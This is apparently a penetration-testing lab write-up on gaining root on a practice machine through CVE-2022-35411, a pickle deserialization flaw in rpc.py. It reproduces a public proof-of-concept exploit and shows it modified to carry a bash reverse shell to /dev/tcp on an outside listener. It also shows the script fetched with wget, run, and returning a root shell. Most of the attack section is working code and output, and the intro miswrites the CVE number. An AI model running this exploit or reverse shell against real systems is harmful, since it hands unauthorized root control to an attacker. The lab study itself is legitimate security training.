CVE-2022-35411
There is an ASGI-based custom RPC server running with the root account that uses an outdated version of rpcpy module, vulnerable to CVE-2012-35411
/Practice/pc/4-Privilege_Escalation/attachments/{7B6EB0CD-AF06-46C3-81CD-0114FBB1AE4D}.png)
A vulnerability has been found in rpc.py up to 0.6.0 and classified as critical. Affected by this vulnerability is an unknown function of the component HTTP Header Handler. The manipulation of the argument serializer with an unknown input leads to a deserialization vulnerability. The CWE definition for the vulnerability is CWE-502. The product deserializes untrusted data without sufficiently verifying that the resulting data will be valid. As an impact it is known to affect confidentiality, integrity, and availability.
Exploit
/Practice/pc/4-Privilege_Escalation/attachments/{B2417A3E-686C-4012-826A-2263024BCF0F}.png)
# Exploit Title: Remote Code Execution in rpc.py through 0.6.0
# Google Dork: N/A
# Date: 2022-07-12
# Exploit Author: Elias Hohl
# Vendor Homepage: https://github.com/abersheeran
# Software Link: https://github.com/abersheeran/rpc.py
# Version: v0.4.2 - v0.6.0
# Tested on: Debian 11, Ubuntu 20.04
# CVE : CVE-2022-35411
import requests
import pickle
# Unauthenticated RCE 0-day for https://github.com/abersheeran/rpc.py
HOST = "127.0.0.1:65432"
URL = f"http://{HOST}/sayhi"
HEADERS = {
"serializer": "pickle"
}
def generate_payload(cmd):
class PickleRce(object):
def __reduce__(self):
import os
return os.system, (cmd,)
payload = pickle.dumps(PickleRce())
print(payload)
return payload
def exec_command(cmd):
payload = generate_payload(cmd)
requests.post(url=URL, data=payload, headers=HEADERS)
def main():
exec_command('curl http://127.0.0.1:4321')
# exec_command('uname -a')
if __name__ == "__main__":
main()Exploit found online
Modification
/Practice/pc/4-Privilege_Escalation/attachments/{A0AD5040-F499-4766-8C7C-D1ADF8706C49}.png)
Appended the reverse shell payloaad
Exploitation
user@pc:/var/tmp$ wget -q http://192.168.45.218/CVE-2022-35411.pyDelivery complete
user@pc:/var/tmp$ python3 CVE-2022-35411.py
b'\x80\x04\x95Q\x00\x00\x00\x00\x00\x00\x00\x8c\x05posix\x94\x8c\x06system\x94\x93\x94\x8c6bash -c "bash -i >& /dev/tcp/192.168.45.218/1234 0>&1"\x94\x85\x94R\x94.'Executing the exploit script
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/pc]
└─$ nnc 1234
listening on [any] 1234 ...
connect to [192.168.45.218] from (UNKNOWN) [192.168.179.210] 47578
bash: cannot set terminal process group (1040): Inappropriate ioctl for device
bash: no job control in this shell
root@pc:/# whoami
root
root@pc:/# hostname
pc
root@pc:/# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
3: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:9e:76:90 brd ff:ff:ff:ff:ff:ff
inet 192.168.179.210/24 brd 192.168.179.255 scope global ens160
valid_lft forever preferred_lft foreverSystem level compromise